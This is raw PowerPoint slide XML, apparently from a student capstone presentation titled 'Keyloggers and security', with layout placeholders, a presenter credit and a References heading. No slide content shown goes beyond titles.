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7" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="270" r:id="rId9"/>
    <p:sldId id="264" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="68580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1048670"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p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048671"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1048586" name="Date Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{ED291B17-9318-49DB-B28B-6E5994AE9581}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048634"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35" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{2CED4963-E985-44C4-B8C4-FDD613B7C2F8}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048636" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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1048620" name="Vertical Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774923" y="863600"/>
            <a:ext cx="7161625" cy="4807326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" ancho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21"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fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048625" name="Footer Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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endParaRPr lang="en-US"/>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94" name="Date Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>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1048640"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1048641" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{B2497495-0637-405E-AE64-5CC7506D51F5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048642" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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endParaRPr lang="en-US"/>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7" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{7BFFD690-9426-415D-8B65-26881E07B2D4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048648" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048651"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endParaRPr lang="en-US"/>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5" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{04C4989A-474C-40DE-95B9-011C28B71673}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048656" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048614" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{5DB4ED54-5B5E-4A04-93D3-5772E3CE3818}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048615" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048659" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048666" name="Footer Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6452590"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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1048628"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630" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{7E18DB4A-8810-4A10-AD5C-D5E2C667F5B3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048631" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>CAPSTONE PROJECT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:cs typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048591" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117529" y="4586365"/>
            <a:ext cx="7980183" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented By:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>1. SARATHY M-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>KI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>NG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>EN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>GI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>NE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>ER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>ING C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>E</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p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048612" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>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600" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
